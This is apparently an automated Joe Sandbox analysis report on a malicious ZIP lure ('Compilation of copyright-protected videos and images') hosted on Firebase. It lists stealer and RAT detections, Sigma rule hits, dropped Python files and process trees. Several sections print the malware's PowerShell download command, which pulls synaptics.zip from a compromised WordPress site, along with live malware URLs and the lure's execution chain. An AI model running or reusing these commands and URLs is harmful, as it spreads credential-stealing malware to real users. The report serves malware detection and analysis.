Play interactive tourEdit tour

Windows Analysis Report
https://firebasestorage.googleapis.com/v0/b/lecongtai-bb82b.appspot.com/o/16-10%2FCompilation%20of%20copyright-protected%20videos%20and%20images.zip?alt=media&token=c97d235f-3349-47aa-b756-15ecdbdf39b1

Overview

General Information

Sample URL:	https://firebasestorage.googleapis.com/v0/b/lecongtai-bb82b.appspot.com/o/16-10%2FCompilation%20of%20copyright-protected%20videos%20and%20images.zip?alt=media&token=c97d235f-3349-47aa-b756-15ecdbdf39b
Analysis ID:	1534680
Infos:

Detection

Python Stealer, Braodo

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Braodo

Yara detected Powershell download and execute

Yara detected Telegram RAT

Powershell drops PE file

Yara detected Generic Python Stealer

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates processes with suspicious names

Drops PE files

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

×

System Summary

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", ProcessId: 6852, ProcessName: cmd.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') ", ProcessId: 6852, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 68, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2076, ProcessName: svchost.exe

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Compliance

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2

Networking

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Performs DNS lookups

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_keccak.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axscript\axscript.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA256.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Protocol\_scrypt.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_ARC4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pythoncom310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\authorization\authorization.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\propsys\propsys.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\internet\internet.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA512.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmondata.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\directsound\directsound.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_x25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed448.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pywintypes310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA224.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\ifilter\ifilter.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32ui.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\odbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA1.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmon.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32uiole.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\mmapfile.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_chacha20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_poly1305.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Math\_modexp.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\pythonservice.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD5.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\mapi\mapi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\servicemanager.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\vcruntime140.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\shell\shell.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA384.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\scintilla.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\python310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\adsi\adsi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\bits\bits.pyd			Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Classification label

Source: classification engine

Classification label: mal72.troj.evad.win@63/1198@2/71

Creates files inside the user directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Executes batch files

Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat"

Reads software policies

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Runs a DLL by calling functions

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Spawns processes

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1932,i,1001838692130139836,6490394009471824799,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://firebasestorage.googleapis.com/v0/b/lecongtai-bb82b.appspot.com/o/16-10%2FCompilation%20of%20copyright-protected%20videos%20and%20images.zip?alt=media&token=c97d235f-3349-47aa-b756-15ecdbdf39b1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1932,i,1001838692130139836,6490394009471824799,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe"
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat"
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im Compilation of copyright-protected videos and images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Compilation of copyright-protected videos and images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Compilation of copyright-protected videos and images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Compilation of copyright-protected videos and images.exe" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2284 --field-trial-handle=1588,i,11174993825772865304,14990651195406688873,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
